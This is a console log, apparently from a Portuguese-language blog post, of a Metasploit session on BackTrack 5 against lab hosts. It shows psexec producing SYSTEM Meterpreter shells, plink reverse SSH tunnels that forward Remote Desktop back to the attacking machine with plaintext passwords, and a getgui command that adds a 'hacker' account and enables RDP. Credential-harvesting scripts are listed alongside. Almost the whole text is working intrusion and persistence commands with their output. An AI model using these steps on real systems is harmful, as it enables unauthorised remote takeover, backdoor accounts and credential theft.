[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.50.30[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.50.30[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (IcHuCEpc - "MrNsyYyumMmdqLiH")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \hunhdDhl.exe...
[*] Sending stage (752128 bytes)
[*] Meterpreter session 3 opened (172.16.49.200-172.16.50.40:0 -> 172.16.50.30:4444) at 2011-12-04 10:43:35 -0200
meterpreter > background
msf exploit(psexec) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 CLIENT125\Administrator @ CLIENT125 172.16.49.200:443 -> 172.16.50.40:1032
2 shell linux SSH root:password (172.16.50.1:22) 172.16.49.200-172.16.50.40:0 -> 172.16.50.1:22
3 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ CASA 172.16.49.200-172.16.50.40:0 -> 172.16.50.30:4444
msf exploit(psexec) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > shell
Process 3244 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 172.16.50.30
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.50.1
C:\WINDOWS\system32>exit
meterpreter > whoami
[-] Unknown command: whoami.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
7- Bonus - acesso remoto das 2 maquinas usando mstsc, tunelado no ssh, na porta 80
msf exploit(psexec) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 CLIENT125\Administrator @ CLIENT125 172.16.49.200:443 -> 172.16.50.40:1032
2 shell linux SSH root:password (172.16.50.1:22) 172.16.49.200-172.16.50.40:0 -> 172.16.50.1:22
3 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ CASA 172.16.49.200-172.16.50.40:0 -> 172.16.50.30:4444
msf exploit(psexec) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 1984 created.
Channel 25 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
c:\>plink.exe -l root -pw cabeca1 -p 21 -C -R 3389:127.0.0.1:3389 172.16.49.200
plink.exe -l root -pw cabeca1 -p 21 -C -R 3389:127.0.0.1:3389 172.16.49.200
FATAL ERROR: Network error: Connection timed out
c:\>plink.exe -l root -pw cabeca1 -p 21 -C -R 3389:127.0.0.1:3389 172.16.49.200^[[D^[
plink.exe -l
PuTTY Link: command-line connection utility
Release 0.53b
Usage: plink [options] [user@]host [command]
("host" can also be a PuTTY saved session name)
Options:
-v show verbose messages
-load sessname Load settings from saved session
-ssh -telnet -rlogin -raw
force use of a particular protocol (default SSH)
-P port connect to specified port
-l user connect with specified username
-m file read remote command(s) from file
-batch disable all interactive prompts
The following options only apply to SSH connections:
-pw passw login with specified password
###################################################################
[*] Welcome to the BackTrack 5 Distribution, Codename "Revolution"
[*] Official BackTrack Home Page: http://www.backtrack-linux.org
[*] Official BackTrack Training : http://www.offensive-security.com
###################################################################
[*] To start a graphical interface, type "startx".
[*] The default root password is "toor".
Last login: Thu Dec 1 15:42:31 2011
root@bt:~#
meterpreter > shell
Process 1984 created.
Channel 25 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
c:\>plink.exe -l root -pw password -p 21 -C -R 3389:127.0.0.1:3389 172.16.49.200
plink.exe -l root -pw password -p 21 -C -R 3389:127.0.0.1:3389 172.16.49.200
FATAL ERROR: Network error: Connection timed out
c:\>plink.exe -l root -pw password -p 21 -C -R 3389:127.0.0.1:3389 172.16.49.200
plink.exe -l
PuTTY Link: command-line connection utility
Release 0.53b
Usage: plink [options] [user@]host [command]
("host" can also be a PuTTY saved session name)
Options:
-v show verbose messages
-load sessname Load settings from saved session
-ssh -telnet -rlogin -raw
force use of a particular protocol (default SSH)
-P port connect to specified port
-l user connect with specified username
-m file read remote command(s) from file
-batch disable all interactive prompts
The following options only apply to SSH connections:
-pw passw login with specified password
###################################################################
[*] Welcome to the BackTrack 5 Distribution, Codename "Revolution"
[*] Official BackTrack Home Page: http://www.backtrack-linux.org
[*] Official BackTrack Training : http://www.offensive-security.com
###################################################################
[*] To start a graphical interface, type "startx".
[*] The default root password is "toor".
Last login: Sun Dec 4 10:57:31 2011 from 172.16.50.40
root@bt:~# exit
exit
logout
Using username "root".
c:\>exit
meterpreter > background
msf exploit(psexec) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 CLIENT125\Administrator @ CLIENT125 172.16.49.200:443 -> 172.16.50.40:1032
2 shell linux SSH root:password (172.16.50.1:22) 172.16.49.200-172.16.50.40:0 -> 172.16.50.1:22
3 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ CASA 172.16.49.200-172.16.50.40:0 -> 172.16.50.30:4444
msf exploit(psexec) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > run
Display all 169 possibilities? (y or n)
meterpreter > run get
run get_application_list run get_pidgin_creds run gettelnet
run get_env run get_valid_community run getvncpw
run get_filezilla_creds run getcountermeasure
run get_local_subnets run getgui
meterpreter > run getgui
Windows Remote Desktop Enabler Meterpreter Script
Usage: getgui -u <username> -p <password>
Or: getgui -e
OPTIONS:
-e Enable RDP only.
-f <opt> Forward RDP Connection.
-h Help menu.
-p <opt> The Password of the user to add.
-u <opt> The Username of the user to add.
meterpreter > run getgui -u hacker -p hacker
###################################################################
[*] Welcome to the BackTrack 5 Distribution, Codename "Revolution"
[*] Official BackTrack Home Page: http://www.backtrack-linux.org
[*] Official BackTrack Training : http://www.offensive-security.com
###################################################################
[*] To start a graphical interface, type "startx".
[*] The default root password is "toor".
Last login: Sun Dec 4 11:01:26 2011 from 172.16.50.40
root@bt:~# exit
exit
logout
Using username "root".
c:\>exit
meterpreter > background
msf exploit(psexec) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 CLIENT125\Administrator @ CLIENT125 172.16.49.200:443 -> 172.16.50.40:1032
2 shell linux SSH root:password (172.16.50.1:22) 172.16.49.200-172.16.50.40:0 -> 172.16.50.1:22
3 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ CASA 172.16.49.200-172.16.50.40:0 -> 172.16.50.30:4444
msf exploit(psexec) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > run get
run get_application_list run get_pidgin_creds run gettelnet
run get_env run get_valid_community run getvncpw
run get_filezilla_creds run getcountermeasure
run get_local_subnets run getgui
meterpreter > run get
run get_application_list run get_pidgin_creds run gettelnet
run get_env run get_valid_community run getvncpw
run get_filezilla_creds run getcountermeasure
run get_local_subnets run getgui
meterpreter > run getgui -h
Windows Remote Desktop Enabler Meterpreter Script
Usage: getgui -u <username> -p <password>
Or: getgui -e
OPTIONS:
-e Enable RDP only.
-f <opt> Forward RDP Connection.
-h Help menu.
-p <opt> The Password of the user to add.
###################################################################
[*] Welcome to the BackTrack 5 Distribution, Codename "Revolution"
[*] Official BackTrack Home Page: http://www.backtrack-linux.org
[*] Official BackTrack Training : http://www.offensive-security.com
###################################################################
[*] To start a graphical interface, type "startx".
[*] The default root password is "toor".
Last login: Sun Dec 4 11:04:12 2011 from 172.16.50.40
root@bt:~# exit
exit
logout
Using username "root".
c:\>
no BT5
root@bt:~# rdesktop 127.0.0.1
Autoselected keyboard map en-us
WARNING: Remote desktop does not support colour depth 24; falling back to 16
Nenhum comentário:
Postar um comentário